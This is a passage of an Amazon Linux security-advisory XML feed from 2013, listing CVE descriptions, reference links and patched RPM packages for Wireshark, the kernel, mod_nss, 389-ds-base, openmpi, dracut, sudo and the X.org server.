Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2012-5598:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2012-5597:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2012-5595:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2012-4292:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2012-4291:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2012-4290:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2012-4289:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2012-4288:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2012-4285:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2012-3825:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2012-2392:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2392" title="" id="CVE-2012-2392" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3825" title="" id="CVE-2012-3825" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4285" title="" id="CVE-2012-4285" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4288" title="" id="CVE-2012-4288" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4289" title="" id="CVE-2012-4289" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4290" title="" id="CVE-2012-4290" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4291" title="" id="CVE-2012-4291" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4292" title="" id="CVE-2012-4292" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5595" title="" id="CVE-2012-5595" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5597" title="" id="CVE-2012-5597" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5598" title="" id="CVE-2012-5598" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5599" title="" id="CVE-2012-5599" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5600" title="" id="CVE-2012-5600" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6056" title="" id="CVE-2012-6056" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6059" title="" id="CVE-2012-6059" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6060" title="" id="CVE-2012-6060" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6061" title="" id="CVE-2012-6061" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6062" title="" id="CVE-2012-6062" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3557" title="" id="CVE-2013-3557" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3559" title="" id="CVE-2013-3559" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3561" title="" id="CVE-2013-3561" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4081" title="" id="CVE-2013-4081" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4083" title="" id="CVE-2013-4083" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4927" title="" id="CVE-2013-4927" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4931" title="" id="CVE-2013-4931" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4932" title="" id="CVE-2013-4932" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4933" title="" id="CVE-2013-4933" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4934" title="" id="CVE-2013-4934" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4935" title="" id="CVE-2013-4935" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4936" title="" id="CVE-2013-4936" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5721" title="" id="CVE-2013-5721" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1569.html" title="" id="RHSA-2013:1569" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="wireshark" version="1.8.10" release="4.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/wireshark-1.8.10-4.12.amzn1.x86_64.rpm</filename></package><package name="wireshark-debuginfo" version="1.8.10" release="4.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/wireshark-debuginfo-1.8.10-4.12.amzn1.x86_64.rpm</filename></package><package name="wireshark-devel" version="1.8.10" release="4.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/wireshark-devel-1.8.10-4.12.amzn1.x86_64.rpm</filename></package><package name="wireshark" version="1.8.10" release="4.12.amzn1" epoch="0" arch="i686"><filename>Packages/wireshark-1.8.10-4.12.amzn1.i686.rpm</filename></package><package name="wireshark-debuginfo" version="1.8.10" release="4.12.amzn1" epoch="0" arch="i686"><filename>Packages/wireshark-debuginfo-1.8.10-4.12.amzn1.i686.rpm</filename></package><package name="wireshark-devel" version="1.8.10" release="4.12.amzn1" epoch="0" arch="i686"><filename>Packages/wireshark-devel-1.8.10-4.12.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-252</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-252: medium priority package update for kernel</title><issued date="2013-12-02 20:30:00" /><updated date="2014-09-16 22:04:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4470:
The Linux kernel before 3.12, when UDP Fragmentation Offload (UFO) is enabled, does not properly initialize certain data structures, which allows local users to cause a denial of service (memory corruption and system crash) or possibly gain privileges via a crafted application that uses the UDP_CORK option in a setsockopt system call and sends both short and long packets, related to the ip_ufo_append_data function in net/ipv4/ip_output.c and the ip6_ufo_append_data function in net/ipv6/ip6_output.c.
1023477:
CVE-2013-4470 Kernel: net: memory corruption with UDP_CORK and UFO
CVE-2013-4348:
The skb_flow_dissect function in net/core/flow_dissector.c in the Linux kernel through 3.12 allows remote attackers to cause a denial of service (infinite loop) via a small value in the IHL field of a packet with IPIP encapsulation.
1007939:
CVE-2013-4348 kernel: net: deadloop path in skb_flow_dissect()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4348" title="" id="CVE-2013-4348" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4470" title="" id="CVE-2013-4470" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="3.4.71" release="63.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.4.71-63.98.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.4.71" release="63.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.4.71-63.98.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.4.71" release="63.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.4.71-63.98.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.4.71" release="63.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.4.71-63.98.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.4.71" release="63.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.4.71-63.98.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.4.71" release="63.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.4.71-63.98.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.4.71" release="63.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.4.71-63.98.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.4.71" release="63.98.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.4.71-63.98.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.4.71" release="63.98.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.4.71-63.98.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.4.71" release="63.98.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.4.71-63.98.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.4.71" release="63.98.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.4.71-63.98.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.4.71" release="63.98.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.4.71-63.98.amzn1.i686.rpm</filename></package><package name="kernel" version="3.4.71" release="63.98.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.4.71-63.98.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.4.71" release="63.98.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.4.71-63.98.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.4.71" release="63.98.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.4.71-63.98.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-253</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-253: medium priority package update for mod_nss</title><issued date="2013-12-03 13:00:00" /><updated date="2014-09-16 22:05:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4566:
A flaw was found in the way mod_nss handled the NSSVerifyClient setting for the per-directory context. When configured to not require a client certificate for the initial connection and only require it for a specific directory, mod_nss failed to enforce this requirement and allowed a client to access the directory when no valid client certificate was provided.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4566" title="" id="CVE-2013-4566" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1779.html" title="" id="RHSA-2013:1779" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod_nss" version="1.0.8" release="19.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_nss-1.0.8-19.12.amzn1.x86_64.rpm</filename></package><package name="mod_nss-debuginfo" version="1.0.8" release="19.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_nss-debuginfo-1.0.8-19.12.amzn1.x86_64.rpm</filename></package><package name="mod_nss" version="1.0.8" release="19.12.amzn1" epoch="0" arch="i686"><filename>Packages/mod_nss-1.0.8-19.12.amzn1.i686.rpm</filename></package><package name="mod_nss-debuginfo" version="1.0.8" release="19.12.amzn1" epoch="0" arch="i686"><filename>Packages/mod_nss-debuginfo-1.0.8-19.12.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-254</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-254: medium priority package update for mod24_nss</title><issued date="2013-12-03 13:00:00" /><updated date="2014-09-16 22:05:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4566:
A flaw was found in the way mod_nss handled the NSSVerifyClient setting for the per-directory context. When configured to not require a client certificate for the initial connection and only require it for a specific directory, mod_nss failed to enforce this requirement and allowed a client to access the directory when no valid client certificate was provided.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4566" title="" id="CVE-2013-4566" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1779.html" title="" id="RHSA-2013:1779" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_nss" version="1.0.8" release="24.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_nss-1.0.8-24.17.amzn1.x86_64.rpm</filename></package><package name="mod24_nss-debuginfo" version="1.0.8" release="24.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_nss-debuginfo-1.0.8-24.17.amzn1.x86_64.rpm</filename></package><package name="mod24_nss-debuginfo" version="1.0.8" release="24.17.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_nss-debuginfo-1.0.8-24.17.amzn1.i686.rpm</filename></package><package name="mod24_nss" version="1.0.8" release="24.17.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_nss-1.0.8-24.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-255</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-255: important priority package update for 389-ds-base</title><issued date="2013-12-11 20:32:00" /><updated date="2014-09-16 22:05:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4485:
It was discovered that the 389 Directory Server did not properly handle certain Get Effective Rights (GER) search queries when the attribute list, which is a part of the query, included several names using the '@' character. An attacker able to submit search queries to the 389 Directory Server could cause it to crash.
389 Directory Server 1.2.11.15 (aka Red Hat Directory Server before 8.2.11-14) allows remote authenticated users to cause a denial of service (crash) via multiple @ characters in a GER attribute list in a search request.
1024552:
CVE-2013-4485 389-ds-base: DoS due to improper handling of ger attr searches
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4485" title="" id="CVE-2013-4485" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base" version="1.3.1.16" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.1.16-1.8.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.1.16" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.1.16-1.8.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-libs" version="1.3.1.16" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.1.16-1.8.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.1.16" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.1.16-1.8.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.1.16" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-devel-1.3.1.16-1.8.amzn1.i686.rpm</filename></package><package name="389-ds-base-libs" version="1.3.1.16" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-libs-1.3.1.16-1.8.amzn1.i686.rpm</filename></package><package name="389-ds-base" version="1.3.1.16" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-1.3.1.16-1.8.amzn1.i686.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.1.16" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.1.16-1.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-256</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-256: medium priority package update for openmpi</title><issued date="2013-12-11 20:32:00" /><updated date="2014-09-16 22:06:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2561:
OpenFabrics ibutils 1.5.7 allows local users to overwrite arbitrary files via a symlink attack on (1) ibdiagnet.db, (2) ibdiagnet.fdbs, (3) ibdiagnet_ibis.log, (4) ibdiagnet.log, (5) ibdiagnet.lst, (6) ibdiagnet.mcfdbs, (7) ibdiagnet.pkey, (8) ibdiagnet.psl, (9) ibdiagnet.slvl, or (10) ibdiagnet.sm in /tmp/.
A flaw was found in the way ibutils handled temporary files. A local attacker could use this flaw to cause arbitrary files to be overwritten as the root user via a symbolic link attack.
927430:
CVE-2013-2561 ibutils: insecure handling of files in the /tmp directory
CVE-2012-4516:
librdmacm 1.0.16, when ibacm.port is not specified, connects to port 6125, which allows remote attackers to specify the address resolution information for the application via a malicious ib_acm service.
It was discovered that librdmacm used a static port to connect to the ib_acm service. A local attacker able to run a specially crafted ib_acm service on that port could use this flaw to provide incorrect address resolution information to librmdacm applications.
865483:
CVE-2012-4516 librdmacm: Tried to connect to port 6125 if ibacm.port was not found
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4516" title="" id="CVE-2012-4516" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2561" title="" id="CVE-2013-2561" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openmpi-debuginfo" version="1.5.4" release="2.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/openmpi-debuginfo-1.5.4-2.24.amzn1.x86_64.rpm</filename></package><package name="openmpi" version="1.5.4" release="2.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/openmpi-1.5.4-2.24.amzn1.x86_64.rpm</filename></package><package name="openmpi-devel" version="1.5.4" release="2.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/openmpi-devel-1.5.4-2.24.amzn1.x86_64.rpm</filename></package><package name="openmpi-debuginfo" version="1.5.4" release="2.24.amzn1" epoch="0" arch="i686"><filename>Packages/openmpi-debuginfo-1.5.4-2.24.amzn1.i686.rpm</filename></package><package name="openmpi-devel" version="1.5.4" release="2.24.amzn1" epoch="0" arch="i686"><filename>Packages/openmpi-devel-1.5.4-2.24.amzn1.i686.rpm</filename></package><package name="openmpi" version="1.5.4" release="2.24.amzn1" epoch="0" arch="i686"><filename>Packages/openmpi-1.5.4-2.24.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-257</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-257: medium priority package update for dracut</title><issued date="2013-12-11 20:33:00" /><updated date="2014-09-16 22:09:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2012-4453:
It was discovered that dracut created initramfs images as world readable. A local user could possibly use this flaw to obtain sensitive information from these files, such as iSCSI authentication passwords, encrypted root file system crypttab passwords, or other information.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4453" title="" id="CVE-2012-4453" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1674.html" title="" id="RHSA-2013:1674" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="dracut-tools" version="004" release="336.21.amzn1" epoch="0" arch="noarch"><filename>Packages/dracut-tools-004-336.21.amzn1.noarch.rpm</filename></package><package name="dracut" version="004" release="336.21.amzn1" epoch="0" arch="noarch"><filename>Packages/dracut-004-336.21.amzn1.noarch.rpm</filename></package><package name="dracut-caps" version="004" release="336.21.amzn1" epoch="0" arch="noarch"><filename>Packages/dracut-caps-004-336.21.amzn1.noarch.rpm</filename></package><package name="dracut-kernel" version="004" release="336.21.amzn1" epoch="0" arch="noarch"><filename>Packages/dracut-kernel-004-336.21.amzn1.noarch.rpm</filename></package><package name="dracut-fips" version="004" release="336.21.amzn1" epoch="0" arch="noarch"><filename>Packages/dracut-fips-004-336.21.amzn1.noarch.rpm</filename></package><package name="dracut-generic" version="004" release="336.21.amzn1" epoch="0" arch="noarch"><filename>Packages/dracut-generic-004-336.21.amzn1.noarch.rpm</filename></package><package name="dracut-fips-aesni" version="004" release="336.21.amzn1" epoch="0" arch="noarch"><filename>Packages/dracut-fips-aesni-004-336.21.amzn1.noarch.rpm</filename></package><package name="dracut-network" version="004" release="336.21.amzn1" epoch="0" arch="noarch"><filename>Packages/dracut-network-004-336.21.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-258</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-258: low priority package update for kernel</title><issued date="2013-12-11 20:33:00" /><updated date="2014-09-16 22:08:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-6382:
Multiple buffer underflows in the XFS implementation in the Linux kernel through 3.12.1 allow local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging the CAP_SYS_ADMIN capability for a (1) XFS_IOC_ATTRLIST_BY_HANDLE or (2) XFS_IOC_ATTRLIST_BY_HANDLE_32 ioctl call with a crafted length value, related to the xfs_attrlist_by_handle function in fs/xfs/xfs_ioctl.c and the xfs_compat_attrlist_by_handle function in fs/xfs/xfs_ioctl32.c.
1033603:
CVE-2013-6382 Kernel: fs: xfs: missing check for ZERO_SIZE_PTR
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6382" title="" id="CVE-2013-6382" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo" version="3.4.73" release="64.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.4.73-64.112.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.4.73" release="64.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.4.73-64.112.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.4.73" release="64.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.4.73-64.112.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.4.73" release="64.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.4.73-64.112.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.4.73" release="64.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.4.73-64.112.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.4.73" release="64.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.4.73-64.112.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.4.73" release="64.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.4.73-64.112.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.4.73" release="64.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.4.73-64.112.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.4.73" release="64.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.4.73-64.112.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.4.73" release="64.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.4.73-64.112.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.4.73" release="64.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.4.73-64.112.amzn1.i686.rpm</filename></package><package name="kernel" version="3.4.73" release="64.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.4.73-64.112.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.4.73" release="64.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.4.73-64.112.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.4.73" release="64.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.4.73-64.112.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.4.73" release="64.112.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.4.73-64.112.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-259</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-259: low priority package update for sudo</title><issued date="2013-12-11 20:34:00" /><updated date="2014-09-16 22:10:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2777:
It was found that sudo did not properly validate the controlling terminal device when the tty_tickets option was enabled in the /etc/sudoers file. An attacker able to run code as a local user could possibly gain additional privileges by running commands that the victim user was allowed to run via sudo, without knowing the victim's password.
CVE-2013-2776:
It was found that sudo did not properly validate the controlling terminal device when the tty_tickets option was enabled in the /etc/sudoers file. An attacker able to run code as a local user could possibly gain additional privileges by running commands that the victim user was allowed to run via sudo, without knowing the victim's password.
CVE-2013-1775:
A flaw was found in the way sudo handled time stamp files. An attacker able to run code as a local user and with the ability to control the system clock could possibly gain additional privileges by running commands that the victim user was allowed to run via sudo, without knowing the victim's password.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1775" title="" id="CVE-2013-1775" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2776" title="" id="CVE-2013-2776" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2777" title="" id="CVE-2013-2777" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1701.html" title="" id="RHSA-2013:1701" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="sudo-devel" version="1.8.6p3" release="12.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-devel-1.8.6p3-12.17.amzn1.x86_64.rpm</filename></package><package name="sudo" version="1.8.6p3" release="12.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-1.8.6p3-12.17.amzn1.x86_64.rpm</filename></package><package name="sudo-debuginfo" version="1.8.6p3" release="12.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-debuginfo-1.8.6p3-12.17.amzn1.x86_64.rpm</filename></package><package name="sudo-devel" version="1.8.6p3" release="12.17.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-devel-1.8.6p3-12.17.amzn1.i686.rpm</filename></package><package name="sudo-debuginfo" version="1.8.6p3" release="12.17.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-debuginfo-1.8.6p3-12.17.amzn1.i686.rpm</filename></package><package name="sudo" version="1.8.6p3" release="12.17.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-1.8.6p3-12.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-260</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-260: low priority package update for xorg-x11-server</title><issued date="2013-12-11 20:34:00" /><updated date="2014-09-16 22:09:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1940:
A flaw was found in the way the X.org X11 server registered new hot plugged devices. If a local user switched to a different session and plugged in a new device, input from that device could become available in the previous session, possibly leading to information disclosure.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1940" title="" id="CVE-2013-1940" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1620.html" title="" id="RHSA-2013:1620" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xorg-x11-server-common" version="1.13.0" release="23.0.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-common-1.13.0-23.0.23.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.13.0" release="23.0.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xnest-1.13.0-23.0.23.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.13.0" release="23.0.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xvfb-1.13.0-23.0.23.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-source" version="1.13.0" release="23.0.23.amzn1" epoch="0" arch="noarch"><filename>Packages/xorg-x11-server-source-1.13.0-23.0.23.amzn1.noarch.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.13.0" release="23.0.23.amzn1" epoch="0" 